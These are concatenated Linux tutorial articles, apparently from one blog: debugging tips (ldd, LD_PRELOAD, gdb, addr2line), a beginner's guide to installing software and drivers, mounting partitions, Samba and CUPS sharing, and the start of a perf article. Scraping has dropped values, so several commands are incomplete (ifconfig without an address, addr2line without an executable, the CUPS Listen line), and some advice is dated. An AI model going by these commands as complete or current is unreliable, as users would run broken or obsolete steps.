When compiling your code, there are a billion flags you can use to make your code more efficient, leaner, more compact, easier to debug, or something else entirely. What I want to focus on here is optimization during the compilation. GCC, which can be considered the de facto compiler on pretty much any Linux, has the ability to optimize your code. Quoting from the official documentation:

Without any optimization option, the compiler’s goal is to reduce the cost of compilation and to make debugging produce the expected results. Statements are independent; if you stop the program with a breakpoint, you can then assign a new value to any variable or change the program counter to any other statement in the function and get exactly the results you would expect from the source code. Turning on optimization flags makes the compiler attempt to improve the performance and/or code size at the expense of compilation time and possibly the ability to debug the program.

In other words, the compiler can perform optimizations based on the knowledge it has of the program. This is done by intermixing your C language with Assembly in numerous ways. For example, simple arithmetic procedures of constant values can be skipped altogether and the final results returned, saving time.

Optimizations can affect the binary file size, its execution speed, or both. At the same time, an optimized binary will be much harder to debug, because some of the instructions may be omitted or reordered. Moreover, the compilation time will probably be longer. Overall, the -O2 level offers a good compromise between the user’s ability to debug, size and performance. It is also possible to compile code at the -O0 level for debugging purposes only, and ship the lean, optimized build to customers.

GCC optimization

Here’s another interesting article on optimizations.

4. LDD (List Dynamic Dependencies)

When you try to run your applications, they may sometimes refuse to start, complaining about missing libraries. This can happen for several reasons, including permissions, a badly configured path or an actual missing library. To know exactly what’s going on, there’s a neat little utility called ldd. It allows you to print the shared library dependencies of your binaries. You should use it.
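For example (the exact library names and paths will differ from system to system):

```shell
# Print the shared library dependencies of a binary
ldd /bin/ls
```

Each line shows a needed library and the path the loader resolved it to; a “not found” entry points straight at the missing piece.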



As I’ve mentioned just moments earlier, the system path can impact the successful startup of applications. For example, you may have several libraries under /opt, but /opt is not defined in the search path, which may only include /lib and /lib64, for instance. When you try to fire up your program, it will fail, not having found the libraries, even though they are physically there. You can work around this issue without copying files around by initializing environment variables that will tell the system where to look.

The word system sounds almighty here, so perhaps a short introduction to how things work might be in order. In Linux, there’s a super-tool called the dynamic linker/loader, ld.so, which does the task of finding and loading libraries for programs to run. ld.so is a smart and efficient tool, so it does not perform a full-system search every time it needs to fire up a binary. Instead, it has its own mini-database, stored under /etc/ld.so.cache, which contains a compiled, ordered list of candidate libraries. It’s somewhat similar to the locate program.

This list is updated by running ldconfig, which most Linux systems execute either during startup or shutdown, but it can be manually run whenever the /etc/ld.so.conf file, which contains the list of search directories, is updated. This also happens after installations of software.

If the linker cannot find libraries, the loading of the program will fail. And you can use LDD to see exactly what gives. Then, you can use the environment variables LD_PRELOAD and LD_LIBRARY_PATH to force loading of libraries outside the search path.

There is some difference between the two. LD_PRELOAD forces the listed libraries to load before any others, while LD_LIBRARY_PATH works much like the standard PATH, adding directories to the library search path. There are many other variables you can change, but that’s what the man page is for.
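A hypothetical sketch (myapp, libtweaks.so and /opt/myapp/lib are made-up names standing in for your own program and library locations):

```shell
# Add an extra directory to the library search path for this invocation only
LD_LIBRARY_PATH=/opt/myapp/lib ./myapp

# Force one specific library to load before all others
LD_PRELOAD=/opt/myapp/lib/libtweaks.so ./myapp
```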

One last hack that you might be interested in is rpath. It allows hard-coding runtime search paths directly into the executable, which might be necessary if you’re using several versions of the same shared library, for instance.

Recursive implementation

LDD displays only unique values. But you might be interested in a recursive implementation. To that end, you might want to check the Recursive LDD tool. It’s a simple Perl script, with some nice tweaks and options. Quite useful for debugging software problems.

Recursive LDD

5. Some more gdb tips

We learned a lot about gdb. Now, let’s learn some more. Specifically, I want to talk to you about the Text User Interface (TUI) functionality. What you want to do is fire up the venerable debugger with -tui option. Then, you will have a sort of a split-screen view of both your code and the gdb prompt, allowing you to debug with higher visual clarity. All the usual tricks still apply.

GDB -tui

You might also be interested in this article.

6. Other tips

One last extra tip is about translating addresses into file names and line numbers, using addr2line. Given an address in an executable or an offset in a section of a relocatable object, it uses the debugging information to figure out which file name and line number are associated with it.

addr2line <addr> -e <executable>

A geeky example; say you have a misbehaving program. And then you run it under a debugger and get a backtrace. Now, let’s assume we have a problematic frame:

# C  []  gzdirect+0x28

All right, so we translate (-e specifies the object file to use). Works both ways. You can translate from offsets to functions and line numbers and vice versa. Again, this can be quite handy for debugging, but you must be familiar with the application and its source.

addr2line 0xa910 -e

addr2line -f -e 0xa910
gzdirect  ? function name

More reading

You might also want to check these:

Linux super-duper admin tools: strace and lsof

Linux system debugging super tutorial

Highly useful Linux commands & configurations


I assume this article is only for the brave, bold and beautiful. It’s definitely not something the absolute majority of you will ever want, need, see, try, require, or anything of that sort. But then, if you’re after impressing girls, there’s no better way of doing it.

Along that noble cause, this tutorial also presents some handy tips for software development and debugging, which, combined with a deep understanding of system internals and wise use of tools like strace, lsof, gdb, and others, can provide an awesome wealth of useful information. We learned how to read and extract information from files, how to work with symbols, how to read the binary format, compilation tips, dynamic dependencies, and several other tweaks and hacks. That should keep you busy for a week or so until you figure out everything. Meanwhile, do send me any ideas you may have on similar topics, if you feel there ought to be a tutorial out there. And see you around.

Highly Useful Linux Commands & Configurations

Oh, you’re gonna love this article! Even though there are many websites hawking similar content, with varying degree of clarity and quality, I want to offer a short, easy-to-use guide to some of the most common yet highly useful commands that could help make your Linux experience more joyful.

Now that you have read some of my installation guides, you have probably setup your system and configured the basic settings. However, I’m positive that some of you must have encountered certain difficulties – a missing package, a missing driver. The initial effort required of a Linux novice can appear daunting, especially after many years of Windows discipline.

Therefore, this article was born, in order to offer simple solutions to some of the more widespread problems that one might face during and immediately after a Linux installation. It is intended for the beginner and intermediate users, who still feel slightly uncomfortable with meddling in command line, scripts or configuration files.

This article will refer to Ubuntu Linux distribution as the demonstration platform. However, all of these commands will work well with many other Linux distributions, with only small changes in syntax, at most. I have personally tested and used all of the commands and configurations in both Debian-based and RedHat-based distributions with success.

What am I going to write about?

Here are the topics. If you want to skip through some of the paragraphs, you can use the table of contents further below, but I recommend you read everything.

  • Basic tips – avoiding classic mistakes.
  • Commands – an introduction to the command line.
  • Installation of software – including extraction of archives and compilation of sources.
  • Installation of drivers – including compilation, loading, configuration, writing of scripts, and addition of drivers to the bootup chain.
  • Mounting of drives – including NTFS and FAT32 filesystems and read/write permissions.
  • Installation of graphic card drivers – including troubleshooting of stubborn common problems.
  • Network sharing – how to access shared folders in Windows and Linux from one another.
  • Printer sharing – how to share printers in Windows and Linux from one another.
  • Some other useful commands.

Table of contents

  1. Basic tips
  2. Commands
    1. Asking for help
  3. Installation of software
    1. What should you choose?
    2. Discipline
    3. Unpacking an archive
    4. Zipped archives
    5. Installation
    6. Compilation (from sources)
    7. Summary of installation procedures
  4. Installation of drivers
    1. Installation
    2. Loading drivers
    3. Configuration of drivers
    4. Scripts
  5. Mounting a drive
    1. Other options
  6. Installation of graphic card drivers
  7. Network sharing
    1. Windows > Linux
    2. Linux > Windows
  8. Printer sharing
  9. Other useful commands
    1. Switching between runlevels
    2. Backing up the X Windows configuration file (useful before graphic drivers update)
    3. Display system environment information
    4. Listing information about files and folders
    5. Kill a process

Basic tips

There are some things you need to know before heading into the deep waters of the Command Line:

  • Linux commands are cAse-sensitive (dedoimedo and Dedoimedo are two different files).
  • It is best to create folders and files in Linux WITHOUT spaces. For example: Red Gemini.doc is a valid Windows filename, but you might have problems accessing it from the command line in Linux; you should rename the file to RedGemini.doc. Users of the DOS command line are also familiar with this problem – commands will fail on folders and files with more than a single word, unless explicitly declared with double quotation marks (“like this”).
  • Pressing TAB when typing a command will auto-complete the command. For example: if you have a single file in a certain folder that begins with the letter p, typing p then TAB will automatically complete the name regardless of its length; if you have more than one file, the command will complete the maximum available part of the string that matches all relevant filenames (s + TAB for smirk and smile will auto-complete to smi).
  • Before copying, moving, deleting, or tweaking any file, especially scripts and configuration files, it is best to back them up first.
  • Do NOT stop the commands while they are running (by pressing Ctrl + C). Even though you may not see the HDD light blinking and the execution takes a very long time, do not assume the system is frozen. Unlike Windows, Linux almost never gets stuck. Let the command complete, be it 5 seconds or 5 hours. Just for reference, compilation of certain programs can take a few days to complete.


To be able to use the command line, you need to be familiar with some rudimentary Linux commands. Former users of DOS will find the transition very simple. Below you can find links to some of the basic Linux commands:

Alphabetic Directory of Linux Commands

An A-Z Index of the Linux BASH command line

Some Useful Linux Commands

Asking for help

First, anything and everything you could ever probably think of has already been answered at least once in a Linux forum; use the forums to find solutions to … everything. Copy & paste your error code / message into a search engine of your choosing (e.g. Google) and you will find links to answers in 99.9996532% of cases.

Locally, help is one of the most useful features available to the command line user. If, for some reason, you cannot figure out the syntax required to use a command, you can ask for help. There are two ways of doing it:

man some_command

The above usage will display the full manual page for the command in question, shown in a pager with Vi-like navigation. You can learn more about Vi from An Extremely Quick and Simple Introduction to the Vi Text Editor.

some_command –help

The above usage will display a summary of available options for the command in question, inside the command line terminal. You will most likely prefer to use this second way.

Installation of software

Although most Linux distributions offer a wealth of useful programs, you will probably be compelled to try new products. Some programs will be available for download via package managers, like Synaptic. Others will only be found on the developer’s site, most likely packaged inside an archive.

You probably ask yourself: What now? The answer is very simple. There are three versions to your downloads, from the easiest to hardest:

  1. Compiled packages, usually with .rpm or .deb extension. These packages are identical to Windows .exe installers and will unpack and install automatically. The upside of the packages is the relative ease of their deployment; the downside is that the user has no control over the installation script.
  2. Compiled archives, called tarballs, with .tar extension. These archives will contain all of the necessary files required to make a program run, but the user will have to install them manually, from the command line, after unpacking the archive. These archives will also most likely be compressed and bear a double extension like tar.gz or tar.bz2. This option offers more control during the installation.
  3. Sources, usually archived. The user will have to unpack the archives and then compile the sources before being able to actually install the program. In addition to better control of the installation, the user will also benefit from software optimized to his hardware configuration.

What should you choose?

The logical choice for the novice user should be 1 > 2 > 3. Intermediate users will probably try 2 > 3. Geeks will most likely only ever compile from sources.


Discipline

This may sound harsh or strict, but certain unspoken rules are followed, which simplify the use of software downloads.

  • The program itself will almost always be accompanied with a how-to, usually in a form of a text file that explains what a user should do, prior, during and after the installation. The how-tos are most often found on the site you download the software from, either as a standalone file, an explanatory text on the download page or bundled with the download.
  • You should read this how-to FIRST before downloading / manipulating the software.
  • A secondary how-to will most often be packed with the program, explaining the installation process itself.
  • You should read this how-to FIRST before installing the software.

Unpacking an archive

The exact syntax will differ from one package to another. But the general idea is the same for all. The only difference will be in the arguments used for unpacking. Here are a few common examples:

tar zxf some_software.tar.gz
tar -xjf some_software.tar.bz2

You can read in detail about the handling of tarballs on the Wikipedia site.
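A quick round trip you can try safely (all the names are made up for the demo):

```shell
mkdir -p some_software
echo 'hello' > some_software/README
tar zcf some_software.tar.gz some_software   # pack and compress
mkdir -p unpacked
tar zxf some_software.tar.gz -C unpacked     # unpack elsewhere
cat unpacked/some_software/README
```

The last command prints hello, confirming the archive survived the round trip intact.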

Zipped archives

Some archives will be zipped rather than tarred. This might put you off. But the problem is easily solvable. If you recall, we have the ability to “ask” for help for each unknown command. In our case, we need to know how to unzip an archive.

unzip –help

Here’s a screenshot I took, depicting the very dilemma we are facing – and its solution:

Linux commands - unzip

A possible usage will then be:

unzip some_software.zip -d /tmp

Reading from the help screen above, we want to unpack our archive into a folder. The argument -d tells us that the contents of the archive will be extracted into a destination directory (folder), in our case a temporary folder called /tmp.


Installation

After unpacking the archive, you will now have to install the software. Usually, the installation is invoked by using a script. The exact name of the script will vary from one program to another, as well as its extension, depending on the language used to write it.

For example, the following command will invoke the script named (written in Perl). Dot and trailing slash indicate that the script will be executed within the current directory.


Compilation (from sources)

Sometimes, the programs will not be compiled and ready to install. The archives will contain lots of files with curious extensions like .c, .h and .o. If you are not a programmer, you should not bother understanding what they are and what they do. Likewise, you need not understand how the compilation of sources is made. You just need to remember three simple commands:

This first command generates the files required to build the software and sets up system-wide parameters.

./configure

This second command builds the libraries and applications.

make

This third command installs the libraries and applications.

make install

For homework, you could use some reading:

Compiling and installing software from source in Linux

There is no guarantee that the compilation will succeed. Some sources are broken! In that case, you should make note of the errors and post them in relevant forums, where you are most likely to find an answer rather quickly.

Summary of installation procedures

To make things easier to understand, below are two examples showing the list of necessary commands required to run to successfully install a downloaded application (please note these are ONLY examples!). Most likely, you will need root privileges (su or sudo) to be able to install software. An archive containing compiled program:

tar zxf some_software.tar.gz
tar -xjf some_software.tar.bz2

cd some_software_directory

An archive containing sources:

tar zxf some_software.tar.gz
tar -xjf some_software.tar.bz2

cd some_software_directory
./configure
make
make install

Installation of drivers

Drivers are programs, like any software. The only difference is – you do not actively use them. They serve the purpose of making your hardware and your operating system understand each other. As simple as that. You need them to enhance your usage of the operating system.

Most often, the necessary drivers will be included with the distribution and installed during the setup. Sometimes, you might not be so lucky and will reach a newly installed desktop without sound, network or video drivers.

I will not go into details explaining how specific drivers are installed. You should contact your vendors for that information. I will explain how to install the drivers, how to load them, and then how to add them to startup, so they will load automatically every time your machine starts.


Just like any software, drivers may be compiled or not. Most often, they will not be. Drivers will usually be distributed as sources, in order to achieve maximal possible compatibility with the hardware on the installation platform. This means you will have to compile from sources. Piece of cake. We already know how to do that.

If the vendor is benevolent, it is possible that the driver will be accompanied with a self-installation script. In other words, you will need to run only one command, which will in turn extract the archive, compile, install, and load it. But this might not be the case – or might not even work. I have personally witnessed a driver self-installation script go wrong. Therefore, for all practical purposes, you should probably manually install the driver.

After successfully extracting the archive and compiling the sources (./configure, make, make install), you will most likely be faced with three choices:

  • The driver will be fully configured and copied to default directories and the system paths updated. You will not need to do anything special to use the driver.
  • The driver will be auto-configured and the system paths updated. This means you will only have to add the driver name to the list of drivers loaded during the boot to enable it every time the machine starts.
  • The driver will be ready to use, but will not be configured nor system paths updated. You will have to manually load the driver and then update the list of drivers loaded during the boot to enable it every time the machine starts.

The second option will make the installation process probably look like this:

tar zxf some_driver.tar.gz
tar -xjf some_driver.tar.bz2

cd some_driver_directory
./configure
make
make install



All that remains is to add this driver to the list of drivers loaded at bootup. In Linux, the drivers are often referred to as modules.

You need to open the configuration file containing the list of modules. You should refer to your specific distribution for the exact name and location of this file. In Ubuntu, the file is called modules.conf and is found in the /etc directory (/etc/modules.conf). We will update this file, but first we will back it up! Please remember that you need root privileges to meddle with the configuration files.

This is what our procedure would look like:

cp /etc/modules.conf /etc/modules.conf.bak
gedit /etc/modules.conf

The above commands will open the file modules.conf inside the gedit text editor. Simply add your driver in an empty line below the existing drivers, save the file, exit the text editor, and reboot for the change to take effect. That’s all!

Here’s an example of a modules.conf file for a Kubuntu Linux, installed as a virtual machine. To add a new driver, we would simply write its name below the existing entries. Of course, you need to know the EXACT name of the driver in question.

Linux commands - modules.conf

The third option is a bit more complex.

Loading drivers

You have successfully compiled the driver, but nothing has happened yet. This is because the driver is not yet enabled. Looking inside the directory, you will notice a file with .ko extension. This is your driver and you need to manually load it.

We need to insert the driver into the kernel. This can be done using the insmod command.

cd driver_directory
insmod driver.ko

After the driver is loaded, it can be configured. To verify that the driver is indeed present, you can list all the loaded modules:

lsmod

If by some chance you have made a terrible mistake and you wish to remove the driver, you can use the rmmod command:

rmmod driver
Configuration of drivers

Configuring the driver requires a bit of knowledge into its functionality. Most often, instructions will be included in the how-to text files.

Below, the example demonstrates how the network card is configured after the network driver is loaded. The network card is assigned an identifier and an IP address. In this particular case, eth0 was the selected device name, although it could also be eth1, eth2 or any other name. The assigned IP address tells us the machine will be part of a LAN network.

ifconfig eth0

After a reboot, you will realize that you no longer enjoy a network connection. This is because your driver has not been created in a common default directory and the system does not know where to look for it. You will have to repeat the entire procedure again:

cd driver_directory
insmod driver.ko
ifconfig eth0

You now realize that an automated script would be an excellent idea for solving this problem. This is exactly what we’re going to do – write a script and add it to bootup.


Like in DOS and Windows, scripts can be written in any text editor. However, special changes are needed to distinguish text files from scripts. In the Windows department, simply renaming the .txt extension to .bat will convert the file to a script. In Linux, things are a bit different.

The Linux command line lives inside a shell. There are several shells, each with a unique set of commands. The most common (and default) Linux shell is BASH. We need to declare the shell at the top of our script, if we wish to make the script communicate with it. Therefore, the above commands plus the shell declaration will make the following script:


#!/bin/bash
cd driver_directory
insmod driver.ko
ifconfig eth0

We can also make it shorter:


#!/bin/bash
insmod /home/roger/driver_directory/driver.ko
ifconfig eth0

Now, we have a script. Or rather a text file that contains the relevant commands. We need to make it into an executable file. First, we need to save the file. Let’s call it network_script. To make the script executable:

chmod +x network_script

Now we have a real script. We need to place it in the /etc/init.d directory so that it will be run during bootup.

cp network_script /etc/init.d/

And finally, we need to update the system, so it will take our script into consideration.

update-rc.d network_script defaults

After you reboot, you will realize that your driver loads automatically and that your network card is configured! Alternatively, it is possible that the make install of the driver will place it in the default directory:

/lib/modules/<KERNEL VERSION>/kernel/drivers/net/driver.ko

Or you could place the driver in this directory by yourself. This way, you will be able to avoid the step of writing the script. However, my method, even if not the most elegant one, has one advantage: Drivers that you have manually compiled and placed into the default directories will be lost every time you update the kernel. This means you will have to reinstall them again after every such update. My method un-elegantly escapes this problem.

Mounting a drive

If you run a dual-boot system, it is entirely possible that you have installed your Linux before you have formatted all the Windows drives. This means that some of these drives might not be mounted – or accessible – when you’re booted in Linux. Alternatively, you might have formatted the drives, but you have resized and relettered and renamed the partitions and they are no longer recognized by Linux. Furthermore, you just might be unlucky and your Linux refuses to see the drives despite your best efforts. Finally, you might be able to see them, but you cannot write to the NTFS drives and this irks you so. Compared to the above tasks, mounting drives is a simple job.

To be able to do this correctly, you need to know how your drives are ordered and what they are called, both in Windows and Linux. This requires that you be able to correlate between Windows partitions (E:\, G:\, K:\ etc.) and Linux partitions (hda1, hda4, hdb2 etc.).

First, make sure you know the order of your partitions in Windows. Then, when booted in Linux, list the Partition Tables:

fdisk -l

The above command will display all the available partitions on your system. In this example, you see only the Linux partitions present, but there might be other (Windows) partitions.

Linux commands - fdisk

For the sake of this exercise, let’s assume that Linux partitions are hda4-6, while Windows partitions are hda1-3.


  • hda1 will be Windows C:\ drive.
  • hda2 will be Windows F:\ drive – also called Data.
  • hda3 will be Windows G:\ drive – also called Games.
  • hda4 will be Linux swap / Solaris.
  • hda5 will be Linux (your /root).
  • hda6 will be Linux (your /home).

Now, before you mount a drive, you need to create a mount point. This is most conveniently done by assigning a directory within the /media directory. For example:

mkdir /media/data

The name data is arbitrary, but it can help relate the mounted drive to its Windows designation. Now, we need to mount the drive that corresponds to data. In our case, this is hda2.

There are several ways of mounting the drive. By default, NTFS partitions are mounted as read-only, although write access can also be enabled. FAT32 partitions are writable by default.
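For a one-off mount in the current session, the command might look like this (the device name and options follow this article’s example layout; requires root):

```shell
mkdir -p /media/data
mount -t ntfs -o ro,nls=utf8,umask=0222 /dev/hda2 /media/data
```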

Like before, mounting the drive manually holds only for the current session. After reboot, the changes will be lost. Therefore, we need to add the mounting of the relevant partitions to the boot chain. The configuration file that holds this crucial information is called fstab and is located under /etc (/etc/fstab).

Therefore, in order to mount the NTFS drive (Windows F:\ drive called data) as read-only we need to:

  • Create a directory called data within /media.
  • Backup fstab.
  • Add a new line to the fstab file – that will mount the NTFS drive hda2 (Windows F:\data) as read-only.
mkdir /media/data
cp /etc/fstab /etc/fstab.bak
gedit /etc/fstab

After opening the file in the text editor, we need to add the mount command. NTFS read-only:

/dev/hda2 /media/data ntfs nls=utf8,umask=0222 0 0

The necessary commands, as well as procedures are well-documented in the Unofficial Ubuntu 6.10 (Edgy Eft) Starter Guide. Here, you can see the sample fstab file inside Kate text editor, for Kubuntu Linux.

Linux commands - fstab

Other options

Alternatively, if you have partitions formatted with FAT32 file system or you wish to be able to write to NTFS partitions from within Linux, you can use the following commands:

FAT32 read/write:

/dev/hda2 /media/data vfat iocharset=utf8,umask=000 0 0

NTFS read/write – requires installation of software that can write to NTFS drives.

apt-get install ntfs-3g
/dev/hda1 /media/data ntfs-3g defaults,locale=en_US.utf8 0 0

An exercise: Let’s assume we wish to be able to write to NTFS partition C, read-only NTFS partition F and use FAT32 partition G. In that case, the list of commands that we need to execute is:

apt-get install ntfs-3g

mkdir /media/windows
mkdir /media/data
mkdir /media/games

cp /etc/fstab /etc/fstab.bak
gedit /etc/fstab


/dev/hda1 /media/windows ntfs-3g defaults,locale=en_US.utf8 0 0
/dev/hda2 /media/data ntfs nls=utf8,umask=0222 0 0
/dev/hda3 /media/games vfat iocharset=utf8,umask=000 0 0

Installation of graphic card drivers

Please note that the commands used in this subsection are for Nvidia drivers ONLY – I have several computers, ALL of which have Nvidia graphics cards – but some of the solutions presented work for both Nvidia and ATI cards.

Although I have already discussed the installation of graphic card drivers in my Installing SUSE Linux and Installing Kubuntu Linux articles, I think a bit of extra guidance will not hurt anyone.

Basically, you can install the graphic card drivers using a Package Manager or via the command line. For most people, the Package Manager method should work flawlessly. It boils down to two commands – downloading the required package and enabling the driver:

apt-get install nvidia-glx
nvidia-glx-config enable

Some people might prefer to install the drivers manually, with the X Windows stopped. To do this, you literally need to stop the desktop from running.

/etc/init.d/gdm stop
/etc/init.d/kdm stop
/etc/init.d/xdm stop

The desktop should vanish and be replaced with a command line. You will probably need to log in. It is possible that you will only see a black screen and no command prompt. Do not be alarmed! A Linux operating system usually has 7 virtual consoles. The first six consoles provide a text terminal with a login prompt to a UNIX shell. The 7th virtual console is used to start the X Windows.

In other words, it may occur that by stopping the X Windows you will have simply switched off the graphics and remained in the 7th virtual console, therefore having no command line to work with. All you need to do is switch to one of the text consoles by pressing Alt + F1-6 on the keyboard. Now, you need to install your driver:


After the installation is complete, you should simply restart the X Windows.

/etc/init.d/gdm start
/etc/init.d/kdm start
/etc/init.d/xdm start

If you see an Nvidia splash logo, it means the driver has been successfully installed. Reboot your machine just to make sure. This is where you might encounter a problem.

Instead of the Nvidia logo, you will see an error message indicating that the X Server has been disabled and that you need to manually edit the settings in the xorg.conf file before being able to proceed to the desktop. Now, there are many possible reasons for such an error and trying to provide a general solution is impossible.

However, I have found the following argument to hold true for many cases: If you have set up your Linux distribution using the GUI installer, you will have probably used the default configurations and the generic kernel will have been installed. In this case, sometimes, the built-in Nvidia driver (nv) might interfere with the installation. There are two methods for solving this problem.

Method 1: Alberto Milone’s envy package

Envy is a command-line application that will download the latest drivers for your card, clean up old drivers and install the new ones. Instructions for the usage can be found below the download links.

Method 2: Do it yourself

First, download the required driver. Then, execute the following commands:

The offending built-in driver needs to be disabled.

gedit /etc/default/linux-restricted-modules-common

Change the last line to DISABLED_MODULES="nv". This will prevent the built-in driver from loading and interfering with your own installed driver.

[Screenshot: editing linux-restricted-modules-common]

Now, you should remove all conflicting files from your system:

apt-get install linux-headers-`uname -r` build-essential gcc gcc-3.4 xserver-xorg-dev

apt-get --purge remove nvidia-glx nvidia-settings nvidia-kernel-common

rm /etc/init.d/nvidia-*

After the offenders are removed, you should install the drivers from the command line:

/etc/init.d/gdm stop
nvidia-xconfig --add-argb-glx-visuals
/etc/init.d/gdm start

Again, you should see the Nvidia splash logo. Reboot just to make sure there are no more surprises. This should get you up and running with the latest graphic card driver.

Network sharing

If you have more than one computer, you are probably sharing resources among them. There is no reason why you should not continue doing this if one of the machines is running a Linux distribution. Sharing can be accomplished in many ways. Perhaps the simplest is using a Samba server. First, install Samba:

apt-get install samba

After the Samba server is installed, you will need to edit a few options in the configuration file to allow sharing privileges.

cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
gedit /etc/samba/smb.conf

In the configuration file, you will need to setup a number of parameters:

  • workgroup = workgroup_name – the name of the Workgroup for your LAN (e.g. HOME)
  • netbios name = netbios_name – without spaces; computer alias by which you will be able to call it across the network
  • security = user
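These edits can be rehearsed on a scratch copy of a minimal smb.conf before touching the real file; in the sketch below, the values HOME and mybox are examples, not anything your system requires:

```shell
# Sketch: edit Samba parameters in a scratch copy, never the live file.
conf=$(mktemp)
cat > "$conf" <<'EOF'
[global]
workgroup = WORKGROUP
security = user
EOF

# Set the workgroup name for the LAN.
sed -i 's/^workgroup = WORKGROUP$/workgroup = HOME/' "$conf"

# Add a netbios name (no spaces) under the [global] section.
sed -i '/\[global\]/a netbios name = mybox' "$conf"

grep -E 'workgroup|netbios|security' "$conf"
```

Once the changes look right on the copy, apply the same edits to /etc/samba/smb.conf (which you have already backed up).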

After saving the configuration file, you will have to restart the Samba server:

/etc/init.d/samba restart

Now, select a folder that you wish to share.

[Screenshot: Samba folder sharing dialog]

If you have ticked the option Writable, you will be able to modify the contents of this folder. Finally, to be able to connect to this share from Windows, you will have to create a Samba user:

smbpasswd -a 'name'

Under 'name' you should specify an existing UNIX user (e.g. roger). Do not forget the apostrophes! You will be asked to create a password. And finally, restart the Samba server again, for the changes to take effect. Now, the sharing itself. Very simple.

Windows > Linux

Start > Run > \\ OR \\netbios_name

When asked for username and password, provide the Samba user name, e.g. roger and the relevant password. And that’s it. Browse to the shared folder. If the shared folder is writable, you will be able to modify the contents.

Linux > Windows

Press Alt + F2. This will bring up the Run Command window. In the Command line, specify the IP address or the name of the computer that you wish to connect. You can see an example below:

[Screenshot: connecting to a Samba share from the Run Command window]

And that’s it. Easy peasy lemon squeasy!

Printer sharing

Well now, folder and file sharing is really easy. What about the printers? Again, it is very simple. If you have a printer installed on a Windows machine, accessing it from a Linux machine will be easy. The rougher side of the coin is accessing a printer installed on a Linux machine from a Windows machine. First, you will have to allow your printer to be shared. Backup and then edit the Common UNIX Printer System configuration file.

cp /etc/cups/cupsd.conf /etc/cups/cupsd.conf.bak
gedit /etc/cups/cupsd.conf

In the file, search for the entry #Listen and add or change as follows:

#Listen OR localhost:631 OR *:631
Listen /var/run/cups/cups.sock

CUPS listens on the port 631. If you use a static IP address for the Linux machine, you can specify only that IP. Otherwise, you might need to use a wildcard. Of course, you should be aware that an open port means a wee less security than before, so keep that in mind. After saving the changes, you will have to restart CUPS:

/etc/init.d/cupsys restart
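The Listen edit can be rehearsed safely on a scratch copy of the configuration before touching /etc/cups/cupsd.conf; this sketch switches a localhost-only listener to the wildcard form:

```shell
# Sketch: change a localhost-only CUPS listener to all interfaces.
conf=$(mktemp)
cat > "$conf" <<'EOF'
Listen localhost:631
Listen /var/run/cups/cups.sock
EOF

# Replace the localhost-only line with a wildcard (*:631) listener.
sed -i 's/^Listen localhost:631$/Listen *:631/' "$conf"

cat "$conf"
```

Remember that widening the listener to *:631 exposes port 631 to the whole network, so restrict it to a static IP where you can.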

Now that the printer is available, you will have to add it for the Windows machine.

Start > Settings > Printers and Faxes
File > Add Printer

… A network printer, or a printer attached to another computer …
… Connect to a printer on the Internet or on a home or office network …

When prompted for the driver, either select from a list or install it from a disk (like CD). And that’s it! You can now print from a Windows machine on a printer connected to a Linux machine.

Tip: If you are using a Lexmark printer, you will probably not be able to find the right Linux drivers for your printer. Worry not! Using generic drivers for Hewlett Packard printers will work remarkably well.

Other useful commands

Here’s a tiny sampling of some other useful tools that you might want to know. Be aware that the commands are presented in a generic way only. A variety of options (switches) can be used in conjunction with many of the commands to make their usage far more complex and effective.

Switching between runlevels

init 0-6

or

telinit 0-6

Backing up the X Windows configuration file

cp /etc/X11/xorg.conf /etc/X11/xorg.conf.bak

Sometimes, you may need or want to configure the X Windows manually:

dpkg-reconfigure xserver-xorg

Display system environment information

You can use the cat (concatenate) command, which will print the contents of the files into the terminal. To display the CPU parameters:

cat /proc/cpuinfo

To display the memory parameters:

cat /proc/meminfo

To find the version of your kernel and the GCC compiler:

cat /proc/version

Furthermore, to find out the version of your kernel:

uname -r
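The two sources should agree: the release string printed by uname -r also appears inside /proc/version. A short sketch to cross-check them:

```shell
# Sketch: cross-check the kernel release against /proc/version.
kernel=$(uname -r)
echo "running kernel: $kernel"

# /proc/version embeds the same release string (plus the GCC version).
if grep -q "$kernel" /proc/version 2>/dev/null; then
    echo "uname -r matches /proc/version"
fi
```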

Listing information about files and folders

This command is the equivalent of the DOS dir command.

ls
To display hidden files as well (starting with dot).

ls -a

Kill a process

Sometimes, you may start an application … only it does not really start. So you try again. But this time, your distro informs you that the process is already running. This can also happen in Windows. Sometimes, processes remain open and need to be killed. Before you can kill a process, you need to know its ID. The command below will list all running processes:

ps -elf

Then, kill the offending process by its ID.

kill PID

Alternatively, you can kill a process by its name. The below command will terminate all processes with the corresponding name (or names).

killall process_name
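The whole cycle – find the PID, kill it, confirm it is gone – can be tried safely on a throwaway background process:

```shell
# Sketch: kill a disposable background process by PID.
sleep 300 &           # a harmless long-running process
pid=$!
echo "started PID $pid"

kill "$pid"                       # same as: kill PID
wait "$pid" 2>/dev/null || true   # reap the terminated job

# kill -0 only probes whether the PID still exists.
if kill -0 "$pid" 2>/dev/null; then
    alive=yes
else
    alive=no
fi
echo "alive=$alive"
```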


Well, that’s it, for now. Hopefully you have learned something.

If you have had problems with your software installations, compilation from sources, drivers, partitions, and sharing, this article may have helped you overcome some of the problems. Personally, the above tips cover about 90% of tasks that a normal user would have to confront as a part of his/her daily usage. Isn’t Linux so much fun? Well, have fun tweaking.

Slow Linux system? Perf to the rescue!

Perf at a glance

Quoting the original page, Perf is a profiler tool for Linux 2.6+ based systems that abstracts away CPU hardware differences in Linux performance measurements and presents a simple command-line interface. Perf is based on the perf_events interface exported by recent versions of the Linux kernel. Perf notation is somewhat similar to version control tools and strace combined. For example, perf stat will run a command and gather performance counter statistics. Perf record will run a command and record its profile into a log file, perf.data by default. Then, perf report will read the log file created by the perf record execution and display the profile. You may also want to analyze lock events, define probes, and more. There's even a top mode.

All in all, I am bluffing like a pro, because it is impossible to learn perf in five minutes of reading, especially if you do not have prior Linux knowledge, significant one at that. You will both need to understand the Linux system behavior fairly well, and be somewhat proficient in the concepts of scheduling, memory management, various interfaces, and CPU architecture. Only then will perf make good sense. Still, let us explore a scenario where this tool proves its awesome merit.

Problem what we have

Say you have a Linux system with multiple users working on it, against a remote file system, e.g. NFS. One of the users reports a certain performance degradation in accessing the network objects, like files and directories. Other users have no such woes. As a smart lad, you immediately start a proper investigation, and you grab your favorite tool, strace.

You execute a summary run, with the -c flag, and in both cases, the quantity of system calls and errors, as well as their order is identical. The only difference is that a specific system call for one user takes longer than for the others. You narrow down your tests using the -e flag, which lets you trace individual calls. With the so-called problematic user, you get a consistently slow result for the stat system call:

strace -tt -T -e lstat /usr/bin/stat /nfs/object.txt
